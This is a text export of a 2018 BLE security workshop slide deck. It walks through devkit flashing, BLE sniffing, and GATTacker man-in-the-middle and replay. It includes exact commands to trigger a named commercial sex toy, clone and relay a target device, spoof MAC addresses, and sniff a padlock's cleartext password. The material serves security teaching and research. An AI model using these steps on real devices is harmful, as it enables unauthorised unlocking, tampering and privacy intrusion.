Sławomir Jasek

slawomir.jasek@smartlockpicking.com
@slawekja

BLE security essentials

Hardwear.io, Hague, 13.09.2018

Sławomir Jasek – short Sławek [suaveck]

Enjoy appsec (dev, break, build...) since 2003.

Pentesting, consulting, training - web, mobile,

embedded, ...

Trainings, workshops, tutorials:

www.smartlockpicking.com

Significant part of time for research.

How much can we fit in a 2 hour workshop?

Bluetooth Smart?
Our hardware – flashing, embedded development
BLE advertisements, connections, services, characteristics
Sniffing BLE
BLE „Man in the Middle”, relay, replay
BtleJacking
General idea

Workshop for BLE beginners.

Most exercises possible to repeat later at home using the
provided hardware.
Bluetooth Smart?
AKA Bluetooth 4, Bluetooth Low Energy
One of most exploding recently IoT technologies.
Completely different than previous Bluetooth 2, 3 (BR/EDR).
Designed from the ground up for low energy usage,
simplicity (rather than throughput).
The main usage scenarios:
a) Advertising (broadcast)
b) Communication between 2 devices (master /
peripheral)
It’s magic...

myvessyl.com
www.vitalherd.com
Startups
1. Come out with a bright idea where to
put a chip in.

2. Buy BLE devkit, some soldering,

integrate mobile app

3. Convincing website + video (bootstrap)

4. Crowdfunding!

5. Profit! http://southpark.cc.com/full-episodes/s18e01-go-fund-yourself
http://www.bluetooth.com/Pages/Medical.aspx
https://www.youtube.com/watch?v=1xrdwhisW-M
https://www.youtube.com/watch?v=RxM55DNS9CE
Fuze card: emulates magnetic stripe credit cards

https://fuzecard.com/
BLE DEVKIT
Why I want you to become embedded developer?

Have your own device, created yourself, for stable exercises.

Possibility to tamper with various options, settings, ...

The best way to understand what happens „under the

hood” and why so many devices remain insecure.
Challenge to secure the default code.
Our hardware set

BLE400 + nRF51822
USB BLE adapters

ST-Link V2
USB UART
Connector wires
Why nRF51822?

- Cheap (below $3 on Aliexpress)

- Easy to develop custom firmware using online mbed.org

ready templates

- Easy to flash using $5 ST-Link or Raspberry Pi GPIO

- Works as BLE RF sniffer (Nordic)

- Works with open-source BtleJack (sniffing/hijacking)

BLE400 nRF51822 eval kit

http://www.waveshare.com/wiki/NRF51822_Eval_Kit

• BLE400 motherboard

• nRF51822 Core module

• Aliexpress: starting at $11
Components

nRF51822 Core module BLE400 motherboard

- nRF51822 chip - USB UART interface
- integrated antenna - pinout (standard 2.5mm), various
- pinout (2mm) other connectors
- starting at $2.75 - jumpers, LEDs, buttons
- starting at $9
Mbed.com

Free compiler online (free account required)

https://os.mbed.com/compiler/

Once logged in, open the nRF board page:

https://os.mbed.com/platforms/Nordic-nRF51822/
Add board
Now back in the compiler
New->New Program, choose template
Hello world = blinky
Blinky source
Blinky main.cpp – blink LED1 few times a second
 Compile

Resulting compiled hex

firmware, to flash module
Note

Recently on mbed.com you may encounter problems with online

compilation of examples (known bug, should be resolved soon).

Source files for „smartlockpicking” device are in the VM:

nrf/smartlockpicking/smartlockpicking_uvision5_nrf51822.zip

You can import this zip into mbed.com (it will compile without
error). You can also use offline mbed CLI or other IDE (e.g. Keil).
Flashing nRF51822 module

Can be flashed using SWD:

- STM32 debugger hardware
(e.g. ST-Link V2)
- Raspberry Pi GPIO
ST-Link V2

Non-original starting at $5
Works with open-source software
openocd (www.openocd.org)
Connect ST-Link to BLE400

SWDIO – SWIO
SWCLK – SWD

GND – GND
3.3V unconnected, we’ll
power board using USB
Connect BLE400
Openocd (already installed)

Kali Linux (already in your VM):

# apt-get install openocd
Openocd – parameters

root@kali:~# openocd -f
/usr/share/openocd/scripts/interface/stlink-v2.cfg
-f /usr/share/openocd/scripts/target/nrf51.cfg

Select ST-Link V2 as Connect to nRF51 target

interface
Start openocd ready script in your VM

root@kali:~# ./openocd.sh
Ready to use script openocd.sh in your VM

Successfully connected
Troubleshooting: bad connection

cortex_m reset_config sysresetreq

adapter speed: 1000 kHz
Info : BCM2835 GPIO JTAG/SWD bitbang driver
Info : SWD only mode enabled (specify tck, tms, tdi
and tdo gpios to add JTAG mode) 1. Have you powered
Info : clock speed 1001 kHz the board via USB?
2. Check your wiring
Info : SWD DPIDR 0x00000001
Error: Could not initialize the debug port
Connect to Openocd console

Openocd listens on TCP/4444. Open new terminal, connect

using telnet:
root@kali:~# telnet localhost 4444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
>
Openocd: „format” flash

Open On-Chip Debugger

> halt
target halted due to debug-request, current mode: Handler HardFault
xPSR: 0xa1000003 pc: 0x0001c320 msp: 0x20003ea8
> nrf51 mass_erase
nRF51822-QFAC(build code: A1) 256kB Flash
> reset
> halt
target halted due to debug-request, current mode: Handler HardFault
xPSR: 0xc1000003 pc: 0xfffffffe msp: 0xffffffd8
 Openocd – write firmware to flash
Choose your ID
> flash write_image nrf/smartlockpicking/smartlockpicking01.hex
Padding image section 0 with 2112 bytes
Padding image section 1 with 2856 bytes
using fast async flash loader. This is currently supported
only with ST-Link and CMSIS-DAP. If you have issues, add
"set WORKAREASIZE 0" before sourcing nrf51.cfg to disable it
Successtarget halted due to breakpoint, current mode: Handler HardFault
xPSR: 0x61000003 pc: 0x2000001e msp: 0xffffffd8
wrote 126572 bytes from file nrf/smartlockpicking/smartlockpicking01.hex in 3.117295s
(39.652 KiB/s)
> reset

Reset the device, new firmware will

start running, LED should blink
In case of trouble...

Padding image section 0 with 2112 bytes

Padding image section 1 with 2856 bytes
using fast async flash loader. This is currently supported
only with ST-Link and CMSIS-DAP. If you have issues, add
"set WORKAREASIZE 0" before sourcing nrf51.cfg to disable it
timeout waiting for algorithm, a target reset is recommended
Failed to write to nrf51 flash
error writing to flash at address 0x00000000 at offset 0x00000000
... try again with reset and halt

> reset

> halt

target halted due to debug-request, current mode:

Handler HardFault

xPSR: 0xc1000003 pc: 0xfffffffe msp: 0xffffffd8

BLE ADVERTISEMENTS
BLE broadcast -> receive

advertisement

Public, by design available for all in

range
(with exception of targeted advertisements, not
widely used in practice)
 Mobile apps

Android: iOS:
nRF Connect for nRF Connect for
Mobile Mobile
https://play.google.com/store/ap https://itunes.apple.com/us/app/l
ps/details?id=no.nordicsemi.andr ocate-beacon/id738709014
oid.mcp

LightBlue
https://itunes.apple.com/us/app/l
ightblue-bluetooth-low-
energy/id557428110
Your device advertisement in nRF Connect

0x08 –
shortened
local name
Advertisement data

Devices broadcast data formatted according to „Generic Access Profile” specification, for
example („header” values):

0x08 «Shortened Local Name»

0x09 «Complete Local Name»

0x16 «Service Data» Beacon values, manufacturer

proprietary...
0xFF «Manufacturer Specific Data»

https://www.bluetooth.org/en-us/specification/assigned-numbers/generic-access-profile
Linux – interacting with BLE

BlueZ, command-line tools, scripting languages...

Hardware: BLE USB dongle

CSR8510 – most common, good enough, ~ 5 EUR

Other chips (often built in laptops)

• Intel, Broadcom, Marvell...
• May be a bit unstable (e.g. with MAC address change)

Power:
• Class II – 2.5 mW, 10m range – most common
• Class I – 100 mW, 100 m range – more expensive, actually not necessary
Update: Kali 2018.3 VM problem

You may experience instability with external USB BLE adapters

with Kali Linux 2018.3 VM (the one provided for workshop).
Example symptom:

Multiple tools may unexpectedly „hang” or not work correctly

(hcitool lescan, gatttool, gatttacker, bleah, ...).
Update: Kali 2018.3 VM problem

Suspected cause: new Linux kernel

https://www.kali.org/releases/kali-linux-2018-3-release/

Solution:
- use Kali 2018.2 with previous kernel 4.15
- downgrade kernel to 4.15 manually
Downgrade kernel to 4.15 manually

1. Edit /etc/apt/sources.list and add following line:

deb [allow-insecure=yes] http://old.kali.org/kali 2018.2 main
2. Update the repositories
# apt-get update
3. Install kernel 4.15:
# apt-get install linux-image-4.15.0-kali2-amd64
(...)
Install these packages without verification? [y/N] y
Downgrade kernel to 4.15 – boot

4. Boot into the 4.15 kernel.

Choose „advanced options (...)” during boot, then „Linux 4.15...”
Turn off sharing Bluetooth devices with host

Turn off
Connect „Cambridge Silicon Radio” to VM

root@kali:~# hciconfig
hci0: Type: BR/EDR Bus: USB
BD Address: 54:4A:16:5D:6F:41 ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING
RX bytes:568 acl:0 sco:0 events:29 errors:0
TX bytes:357 acl:0 sco:0 commands:30 errors:1

root@kali~#: hciconfig hci0 up

root@kali:~# hciconfig hci0 version
hci0: Type: BR/EDR Bus: USB
BD Address: 54:4A:16:5D:6F:41 ACL MTU: 310:10 SCO MTU: 64:8
HCI Version: 4.0 (0x6) Revision: 0x22bb
LMP Version: 4.0 (0x6) Subversion: 0x22bb
Manufacturer: Cambridge Silicon Radio (10)
The device advertisement

root@kali:~# hcitool lescan

LE Scan ...
D0:C9:2E:63:50:B3 smartlockpicking01
D0:C9:2E:63:50:B3 (unknown)
D0:C9:2E:63:50:B3 smartlockpicking01
D0:C9:2E:63:50:B3 (unknown)
 Bleah

https://github.com/evilsocket/bleah/
https://www.evilsocket.net/2017/09/23/This-is-not-a-post-about-BLE-introducing-BLEAH/
# bleah
Your device advertisement in bleah

root@kali:~# bleah
Introducing GATTacker – gattack.io

Open source
Node.js
Websockets
Modular design
Json
.io website

And a cool logo!

Install in current Kali (since 2018.2)

root@kali:~# apt-get install nodejs npm

root@kali:~# npm install gattacker
Step 1 – run ws-slave module

advertisement

Advertisement
JSON scan.js

ws-slave.js
Running the ws-slave (client)

root@kali:~# cd node_modules/gattacker

root@kali: ~/node_modules/gattacker # node ws-slave.js

GATTacker ws-slave
Step 2 – scan (connecting to ws-slave)

advertisement

Advertisement
JSON scan.js

ws-slave.js
Scan for advertisements

root@kali:~/node_modules/gattacker# node scan.js

Ws-slave address: 127.0.0.1

on open

poweredOn

Start scanning.
Troubleshooting

root@kali:~/node_modules/gattacker# node
scan
Ws-slave address: 127.0.0.1
on open Your BLE adapter is off
# hciconfig hci0 up
poweredOff
scan.js

# node scan.js
connects to ws-slave
listens to all advertisements,
saves them automatically to JSON files (devices/ subdir).
GATTacker: scan for devices

Device MAC
The advertisement file

Node_modules/gattacker/devices/<MAC>_<name>.adv.json
"id": "d0c92e6350b3",
"eir": "0201041308736d6172746c6f636b7069636b696e673031", Raw hex data (according to
"scanResponse": null, BLE spec), used later
"decodedNonEditable": {
"localName": "smartlockpicking01",
"manufacturerDataHex": null,
"manufacturerDataAscii": null, Decoded just for display
"serviceUuids": []
}
Sex toys...

https://www.pentestpartners.com/security-blog/screwdriving-
locating-and-exploiting-smart-adult-toys/ https://internetofdon.gs/
„Screwdriving”

Devices just announce their name.

You don’t need any tools to see it.
„Screwdriving”

List of the sex toys

Bluetooth names:
https://github.com/internetofdongs/IoD-
Screwdriver/blob/master/Device_List.txt

We’ll get back to these devices later.

BLE SERVICES
BLE central <-> peripheral

BLE

central peripheral
Services, characteristics, ... SERVICE, eg. 0x180F - battery

Characteristic

Descriptor: string
(e.g. “Battery level”)
Service – groups several characteristics
Descriptor:
subscription status

Characteristic – contains a single value Properties: read, write, notify

(authenticated or not)

Descriptor – additional data

Value

Properties – read/write/notify...
Characteristic
(...)

Value – actual value

SERVICE
(...)
Your „smartlockpicking” device

You will connect to your

„smartlockpicking” device using nRF
Connect mobile application.
Services in nRF Connect SERVICE, eg. 0x180F - battery

services

SERVICE
(...)
Device characteristics (in service) SERVICE, eg. 0x180F - battery

Characteristic

Properties: read, write, notify

(authenticated or not)

Characteristic
(...)

SERVICE
(...)
Reading, writing, notifications

Each characteristic has properties: read/write/notify

Can be combined (e.g. read+notify, read+write, ...)

Read/write – transmit single value

Notifications

• Getting more data or receiving periodic updates from a

device
• The central device subscribes for a specific characteristic,
and the peripheral device sends data asynchronously
Read characteristic in nRF Connect
Our LED switching
service with 2
characteristics

Read value

This value in our

device: current LED
status
Write to characteristic in nRF Connect

01: turns on the

LED

write
Linux: device advertisement

root@kali:~# hcitool lescan

LE Scan ...
D0:C9:2E:63:50:B3 smartlockpicking01
D0:C9:2E:63:50:B3 (unknown)
D0:C9:2E:63:50:B3 smartlockpicking01
D0:C9:2E:63:50:B3 (unknown)

MAC address
gatttool – blueZ command-line interface
The device advertises
random MAC address type

root@kali:~# gatttool -I -b B8:27:EB:08:88:0E -t random

[B8:27:EB:08:88:0E][LE]>

Your device MAC address

Interactive
Connect to it from Kali - gatttool

root@kali:~# gatttool -I -b B8:27:EB:08:88:0E -t random

[B8:27:EB:08:88:0E][LE]> connect

Attempting to connect to B8:27:EB:08:88:0E

Connection successful

[B8:27:EB:08:88:0E][LE]>

Blue = connected
Troubleshooting

Check if your BLE adapter is up

# hciconfig hci0
Troubleshooting v2

a) Start Bluetooth service

# systemctl start bluetooth
b) Try with random address type
# gatttool –I –b <MAC> -t random
Read characteristic value Handle for 0x2a00
(Device Name)

[D0:C9:2E:63:50:B3][LE]> char-read-hnd 0x03

Reading characteristics

Read value from characteristic, using handle

[B8:27:EB:60:2B:46][LE]> char-read-hnd 0x03

ascii hex
Decode HEX: e.g. in CyberChef

https://gchq.github.io/CyberChef/
Toggle the LED status

The characteristics that switch the LEDs as visible in

[D0:C9:2E:63:50:B3][LE]> characteristics

Handle 0x0025, 0x0027

Toggle the LED status handle

value
[D0:C9:2E:63:50:B3][LE]> char-write-req 0x25 01
[D0:C9:2E:63:50:B3][LE]> char-write-req 0x25 00

[D0:C9:2E:63:50:B3][LE]> char-write-req 0x27 01

[D0:C9:2E:63:50:B3][LE]> char-write-req 0x27 00
Our sex toy: writing to characteristics
Writing to characteristics

Let’s vibrate our sex toy!

root@kali:~# gatttool -I -b 38:D2:69:E5:23:B1
We will explain later how
[38:D2:69:E5:23:B1][LE]> connect we got these values

[38:D2:69:E5:23:B1][LE]> char-write-cmd 0x36 c5552daa

Enumerate services + characteristics in bleah

root@kali:~# bleah -b d0:c9:2e:63:50:b3 -e

Your MAC
Bleah vs sex toy (enumerate services)
Bleah vs sex toy: vibrate

Using bleah: -b <MAC> -n <handle> -d <data>

root@kali:~# bleah -b 38:d2:69:e5:23:b1 -n 0x36 -d c5552daa

GATTacker

1) Run the ws-slave

2) Run scan – without parameters just scans for all
advertisements, finds all the devices nearby
3) Run scan for specific device (MAC) – scans device
services and characteristics to JSON file
GATTacker

advertisement

Advertisement
JSON, services
JSON
scan.js
services?

ws-slave.js
GATTacker: running the ws-slave (client)

$ cd node_modules/gattacker

$ ~/node_modules/gattacker $ sudo node ws-slave.js

GATTacker ws-slave
GATTacker: scan for devices

Device MAC
Scan specific device characteristics Target device
MAC

root@kali:~/node_modules/gattacker# node scan f4b85ec06ea5

Ws-slave address: <your_slave_ip>
on open
poweredOn
Start exploring f4b85ec06ea5
Start to explore f4b85ec06ea5
explore state: f4b85ec06ea5 : start
explore state: f4b85ec06ea5 : finished
Services file devices/f4b85ec06ea5.srv.json saved!
Json services file
SERVICE, eg. 0x180F - battery
(devices/<MAC....>.srv.json) Characteristic

service Descriptor: string

{ (e.g. “Battery level”)
"uuid": "1800",
"name": "Generic Access", Descriptor:
"type": "org.bluetooth.service.generic_access", subscription status
"startHandle": 1,
"endHandle": 11,
Properties: read, write, notify
"characteristics": [
{
characteristics (authenticated or not)
"uuid": "2a00",
"name": "Device Name",
"properties": [ Value
"read"
],
"value": "5061646c6f636b21",
"descriptors": [], Characteristic
"startHandle": 2, (...)
"valueHandle": 3,
"asciiValue": "Padlock!"
}, SERVICE
(...)
BLE SNIFFING
Hacking challenge – steal a car!
How do we hack it?

BLE

Passive sniffing?
central peripheral
Bluetooth 4 security (specification)

Pairing
Key Generation
Encryption
Encryption in Bluetooth LE uses AES-CCM cryptography. Like BR/EDR, the LE Controller
will perform the encryption function. This function generates 128-bit encryptedData
from a 128-bit key and 128-bit plaintextData using the AES-128-bit block cypher as
defined in FIPS-1971.
Signed Data
https://developer.bluetooth.org/TechnologyOverview/Pages/LE-Security.aspx
Bluetooth 4 security (specification)

„The goal of the low energy security mechanism is to protect

communication between devices at different levels of the
stack.”
• Man-in-the-Middle (MITM)
• Passive Eavesdropping
• Privacy/Identity Tracking
Bluetooth 4.0 - pairing
Pairing (once, in a secure environment)
• JustWorks (R) – most common, devices without display cannot
implement other
• 6-digit PIN – if the device has a display
• Out of band – not yet spotted in the wild
Establish Long Term Key, and store it to secure future
communication ("bonding")
"Just Works and Passkey Entry do not provide any passive
eavesdropping protection"
4.2 – elliptic curves
Mike Ryan, https://www.lacklustre.net/bluetooth/
BLE security - practice
• 8 of 10 tested devices do not implement BLE-layer encryption
• The pairing is in OS level, mobile application does not have full control over it
• It is troublesome to manage with requirements for:
• Multiple users/application instances per device
• Access sharing
• Cloud backup
• Usage scenario does not allow for secure bonding (e.g. public cash register,
"fleet" of beacons, car rental)
• Other hardware/software/UX problems with pairing
• "Forget" to do it, or do not consider clear-text transmission a problem
BLE security - practice
Security in "application" layer
(GATT)
Various authentication schemes
• Static password/key
• Challenge-response (most common)
• „PKI”
Requests/responses encryption
No single standard, library,
protocol
Own crypto, based usually on AES
Sniffing – BLE RF essentials
Advertisement channels

http://www.connectblue.com/press/articles/shaping-the-wireless-future-with-low-energy-applications-and-systems/
BLE channel hopping

37 channels for data,

3 for advertisements
Sniffing: catch the initial
packet and follow
channel hopping

http://lacklustre.net/bluetooth/bluetooth_with_low_energy_comes_low_securit
y-mikeryan-usenix_woot_2013-slides.pdf
Catching initial packet to follow

Connection starts at one of 3 advertisement channels.

Device can limit the used channels, but usually use all 3 and
can start at any of them.
Catching initial packet:
- Sniff all the 3 advertising channels at once
- Sniff just one channel and have luck
Pro devices ($$$) – scan whole spectrum

Ellisys Bluetooth Explorer 400 ComProbe BPA® 600 Dual

All-in-One Bluetooth® Protocol Mode Bluetooth®
Analysis System
Protocol Analyzer
http://www.ellisys.com/products/bex400/ http://www.fte.com/products/BPA600.aspx
Software Defined Radio

BLE SDR sniffer for HackRF One:

https://github.com/JiaoXianjun/BTLE
Passive sniffing – Ubertooth (120$)

Open-source (software, hardware).

External antenna.

RF-level sniffing, possible to inspect in

Wireshark.

Can be combined in 3 to cover all advertising

channels.

http://greatscottgadgets.com/ubertoothone/
Nordic BLE sniffer

Turn nRF device (e.g. devkit) into sniffer.

https://www.nordicsemi.com/eng/Products/Bluetooth-low-
energy/nRF-Sniffer
Adafruit Bluefruit LE sniffer ($25)
https://www.adafruit.com/product/2269
Turn our BLE module into sniffer

Same nRF51822, a bit

cheaper than Adafruit.

Need to be flashed with

sniffer firmware.

New version 2.0.0-beta

available here.
http://www.waveshare.com/nrf51822-eval-kit.htm
Our „smartlockpicking” device

Take out the module from BLE400 board, it will now work as
a standalone device.
Just VCC (3V, not 5!) and GND.
Our „smartlockpicking” device can work standalone

Just connect VCC (3V) and GND,

you can use the BLE400
2mm -> 2.54 mm wires required

VCC GND
BTW, you can connect external USB TTL
External USB TTL

RXD->P09
TXD->P011

3V (NOT 5!) VCC

GND
Now put the second module in the board to flash

Second module to
flash with sniffer

Standalone
„smartlockpicking” device,
just powered from board
Flash second module with a sniffer firmware

> halt
> nrf51 mass_erase
> reset
> halt
> flash write_image
nrf/sniffer/sniffer_pca10028_51296aa.hex
(...)
> reset
Setting up the sniffer – connect to USB

root@kali:~# dmesg
(...)
[25958.451531] usb 2-2.2: new full-speed USB device number 10 using
uhci_hcd
[25958.707592] usb 2-2.2: New USB device found, idVendor=10c4,
idProduct=ea60
[25958.707596] usb 2-2.2: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[25958.707598] usb 2-2.2: Product: CP2102 USB to UART Bridge Controller
[25958.707600] usb 2-2.2: Manufacturer: Silicon Labs
[25958.707601] usb 2-2.2: SerialNumber: 0001
[25958.713131] cp210x 2-2.2:1.0: cp210x converter detected
[25958.717133] usb 2-2.2: cp210x converter now attached to ttyUSB0
Wireshark installation #1 (already in your VM)

Help->About->Folders

Check the Extcap path

Wireshark #2 install extcap (already in your VM)

Unzip the Sniffer downloaded from Nordic:

root@kali:~/nrf_sniffer_2.0.0-beta-1_51296aa/extcap# ls

nrf_sniffer.bat nrf_sniffer.py SnifferAPI

root@kali:~/nrf_sniffer_2.0.0-beta-1_51296aa/extcap# cp -r
* /usr/lib/x86_64-linux-gnu/wireshark/extcap/
Wireshark install #3 – turn on interface toolbar

View-> Interface
Toolbars -> nRF Sniffer
Wireshark

nRF Sniffer toolbar

Your sniffer device

detected properly. Click
here to start sniffing
Filter specific
device
Tons of
advertisements
Filter specific device
https://www.thequicklock.com
Let’s try to sniff „Padlock!” device
The advertising channels again
Advertisement channels

http://www.connectblue.com/press/articles/shaping-the-wireless-future-with-low-energy-applications-and-systems/
Limit the channels for sniffing

In order to you maximize a chance to get a connection, you

can have 3 independent sniffers, set for specific channels.
Limit the channel on your sniffer, only to 37 or 38 or 39.
„btatt”: filter out the advertisements, only read/write,...
Filter only write requests (btatt.opcode == 0x12)

Find write packet, right click on Opcode

(Write Request) and apply as filter
Gotcha!

„12345678” – cleartext password

 Quicklock hack is brought to you by Antony Rose

https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Rose-Ramsey-Picking-Bluetooth-Low-Energy-Locks.pdf
Manufacturer’s statement

The electronic codes necessary to open are passed wirelessly and are
unencrypted (by design) to allow vendors flexibility when integrating the
bluetooth device into existing platforms. Because keys are passed wirelessly,
they are open to Bluetooth hacking only for a few seconds, when a hacker is
within range of the device. However, this level of security is similar to a
standard lock and key scenario! Standard mechanical devices offer far fewer
benefits than Bluetooth connected locks!

https://www.thequicklock.com/security-notice.php
ANDROID HCIDUMP
„WHITEBOX” APPROACH
How do we hack BLE?

HCI dump BLE

Passive sniffing?
central peripheral
Android HCI dump – white box approach

1. Enable Developer options in Android

About phone->Build number-> tap until „You are now a developer!”
2. Settings->Developer options->Enable Bluetooth HCI log
The file is saved in /sdcard/btsnoop_hci.log
Readable in Wireshark
Host Controller Interface

Linux (BlueZ), Android...

# hcidump
Hcidump

Dumps commands and data exchanged between host OS and adapter

firmware.

You will see only public advertisements and data exchanged with your
host.

In case of link-layer encryption, hcidump shows unencrypted data.

Does not dump raw RF packets.

BLE-Replay by NCC

https://github.com/nccgroup/BLE-Replay
Parses hcidump to json, wraps into python BLE client for
replay/fuzzing
Example btsnoop_hci.log for our padlock
How do we hack BLE?
Passive sniffing Android HCI dump
Using simple hw is unreliable, Catches all the packets (of our
easy to loose packets. transmission)

Difficult to understand Difficult to understand transmission

transmission in Wireshark. in Wireshark

Limited scripting – decode pcap, Limited scripting – decode pcap,

replay packets. replay packets.

Can be helpful to diagnose what Does not cover link-layer. Only data
is happening on link-layer (e.g. exchanged between Android and BT
Bluetooth encryption) adapter

Does not require access to device Requires access to smartphone

nor smartphone
Even if the connection is encrypted,
Limited possibilities to decode we have the packets in cleartext (de-
encrypted connections (intercept /encrypted by adapter)
pairing + CrackLE).
INTERCEPTING
MOBILE APP
Frida – hooking mobile app

a
Frida

HCI dump BLE

Passive sniffing?
central peripheral
Frida hooks in mobile application

Replace writing to characteristic with your own function

https://www.pentestpartners.com/security-blog/reverse-engineering-ble-from-android-apps-with-frida/
Frida - results

https://www.pentestpartners.com/security-blog/reverse-engineering-ble-from-android-apps-with-frida/
Possible advantage

This way it may be possible to hook into cleartext values

before encryption/obfuscation.
BLE MITM
The car hacking contest again
Sometimes...

We can sniff the link

communication, but it is
encrypted on GATT layer.
(we see only encrypted hex
stream)
How about active interception?

Man in the Middle:

We will force the mobile app to connect to us, and forward
the requests to the car and back!
How do we hack BLE?

Active
HCI dump BLE MITM

Passive sniffing?
central peripheral
How do we MITM RF?

Mallory

Alice

Bob
Isolate the signal?
Physics...

Bending of a wave around the edges of an opening

or an obstacle

https://en.wikipedia.org/wiki/Diffraction

https://en.wikipedia.org/wiki/Huygens%E2%80%93Fresnel_principle
 Stronger signal? More signals?

Class 1 adapter? +8dBm, 100m range

"little difference in range whether the other

end of the link is a Class 1 or Class 2 device as
the lower powered device tends to set the
range limit"
And how to handle them in a single system?
https://en.wikipedia.org/wiki/Bluetooth
Typical connection flow
Start scanning for
advertisements

Advertise

Specific advertisement
received, stop scanning

Connect the advertising device (MAC)

Further communication
Attack?
Start scanning for
advertisements
Advertise more
frequently
Specific advertisement
received, stop scanning
MITM?
Keep connection to
original device. It
does not advertise
Connect the advertising device (MAC) while connected ;)

Further communication
MITM – what actually works

Advertise more frequently

• The victim's mobile will interpret the first advertisement it receives
• Devices usually optimized for longer battery life, advertise less frequently
Clone MAC address of targeted device
• Not always necessary, but mostly helpful
Keep connected to target device
• Devices do not advertise while connected
• Only one connection at a time accepted
• Usually easy, most connections are short-term
• For constantly-connected: targeted jamming/social engineering/patience...
GATTacker – MITM

Open source
Node.js
Websockets
Modular design
Json
.io website

And a cool logo!

GATTacker - architecture
Advertising „cloned”
device Advertise

Get serv Get serv

Device cloning

services services

„PROXY” –
interception,
tampering
We will team up for 2 separate boxes
Advertising „cloned”
device Advertise

Get serv Get serv

Device cloning

servicesBox 1 – Box 2 – services

emulated device „PROXY” – connects to

interception,
tampering
target
Separate boxes

It is possible to run both components on one box (configure

BLENO/NOBLE_HCI_DEVICE_ID in config.env).
But it is not very reliable at this moment (kernel-level device
mismatches).
Much more stable results on a separate ones.
Box 2 – switch VM to „bridge mode”, check IP
Box 2 - run ws-slave (client)

root@kali:~# cd node_modules/gattacker

root@kali: ~/node_modules/gattacker # node ws-slave.js

GATTacker ws-slave
Box 1 (emulating device) – edit config file

root@kali:~# cd node_modules/gattacker/

root@kali:~/node_modules/gattacker# gedit config.env

Edit BLENO_HCI_DEVICE_ID to your HCI, WS_SLAVE address to

match your Raspberry
# "peripheral" device emulator
BLENO_HCI_DEVICE_ID=0
# ws-slave websocket address
WS_SLAVE=127.0.0.1 -> IP_OF_YOUR_COLLEGUE
1. Scan device to JSON
Box 1 Box 2

advertisement

WIFI
Advertisement
+ services JSON scan.js

ws-slave.js
Scan for advertisements (Kali)

root@kali:~/node_modules/gattacker# node scan.js

Ws-slave address: <your_slave_ip>

on open

poweredOn

Start scanning.
GATTacker: scan for devices

Device MAC
Scan device characteristics Target device
MAC

root@kali:~/node_modules/gattacker# node scan f4b85ec06ea5

Ws-slave address: <your_slave_ip>
on open
poweredOn
Start exploring f4b85ec06ea5
Start to explore f4b85ec06ea5
explore state: f4b85ec06ea5 : start
explore state: f4b85ec06ea5 : finished
Services file devices/f4b85ec06ea5.srv.json saved!
2. Advertise

advertisement Advertisement
+ services JSON

advertise.js
Free the BT interface

In case you have running ws-slave on the same machine, stop it (we
will need the BT interface):
(...) ws -> close

^Croot@kali:~/node_modules/gattacker#

Also stop bluetooth service, it may interfere:

root@kali:~# systemctl stop bluetooth

Check that your bluetooth adapter is up

# hciconfig
hci0: Type: Primary Bus: USB
BD Address: 00:1A:7D:DA:72:00 ACL MTU: 310:10 SCO MTU: 64:8
DOWN RUNNING
RX bytes:574 acl:0 sco:0 events:30 errors:0
TX bytes:368 acl:0 sco:0 commands:30 errors:0
# hciconfig hci0 up
# hciconfig
hci0: Type: Primary Bus: USB
BD Address: 00:1A:7D:DA:72:00 ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING
RX bytes:1148 acl:0 sco:0 events:60 errors:0
TX bytes:736 acl:0 sco:0 commands:60 errors:0
advertise

root@kali:~/node_modules/gattacker# node advertise.js -h

Usage: node advertise -a <FILE> [ -s <FILE> ] [-S]
-a, --advertisement=FILE advertisement json file
-s, --services=FILE services json file
-S, --static static - do not connect to ws-slave/target
device
-f, --funmode have fun!
--jk see http://xkcd.com/1692
-h, --help display this help
Start to advertise your device

root@kali:~/node_modules/gattacker# node advertise.js -a

devices/d0c92e6350b3_srtlockpicking01.adv.json

Your device advertisement (not

services) json file. The script assumes
services file (-s) is <mac>.srv.json
Properly initialized

Connection to target device

established
Troubleshooting

The script stops here, cannot

connect to target device

If you are already connected to your device, disconnect.

Try to restart your device.
Troubleshooting v2

Connection to target device successful,

but BLE interface for emulation is down

Is your Bluetooth adapter interface up?

# hciconfig hci0 up
Connect to your emulated device

Notice the MAC address is your

BLE adapter’s MAC, not original
device.
The advertising interval is also a
magnitude shorter.
Now try to send something to device from nRF

Intercepted read and

write requests
REPLAY
Data dump of the intercepted communication

dump/<MAC>.log
Dump data format

Logs are saved in text format:

timestamp | type | service UUID (optional name) | characteristic

UUID (optional name) | hex data (ascii data)

example:

2017.03.24 17:55:10.930 | > R | 180f (Battery Service) | 2a19

(Battery Level) | 50 (P)
Transmission type

> R - received read

> N - received notification

< W - sent write request (without response)

< C - sent write command (with response)
Replay

You can edit the dump file, e.g. change value „01” to „00”
2018.03.22 05:52:14.321 | < C | a000 | a001 | 00 ( )
Replay script

root@kali:~/node_modules/gattacker# node replay.js

-i dump/d0c92e6350b3.log -p d0c92e6350b3 -s
devices/d0c92e6350b3.srv.json
Target device
Target device MAC
services, previously
Dump file scanned
Replay using nRF Connect mobile app

https://github.com/securing/gattacker/wiki/Dump-and-replay

nRF Connect:

https://play.google.com/store/apps/details?id=no.nordicsemi.android.mcp
Macros functionality

nRF Connect: macros documentation:

https://github.com/NordicSemiconductor/Android-nRF-
Connect/tree/master/documentation/Macros
GATTacker howto export:
https://github.com/securing/gattacker/wiki/Dump-and-
replay
Convert GATTacker log to nRF XML macro

# node gattacker2nrf -i dump/f4b85ec06ea5.log > replay.xml

MAC SPOOFING
Bluetooth MAC address spoofing

Some mobile applications rely only on advertisement

packets, and don’t care for MAC address.
But most of them (including this one) do.
It is easy to change Bluetooth adapter MAC using bdaddr
tool (part of Bluez)

For some chipsets it may be troublesome.

Bdaddr (already in your VM/Raspberry)

root@kali:~/node_modules/gattacker/helpers/bdaddr# make

gcc -c bdaddr.c

gcc -c oui.c

gcc -o bdaddr bdaddr.o oui.o -lbluetooth

# cp bdaddr /usr/local/sbin
Change MAC
root@kali:~# bdaddr
Can't read version info for hci0: Network is down (100)
root@kali:~# hciconfig hci0 up
root@kali:~# bdaddr
Manufacturer: Cambridge Silicon Radio (10)
Device address: 00:1A:7D:DA:72:00 Your target MAC
root@kali:~# bdaddr -i hci0 00:1A:7D:DA:72:01
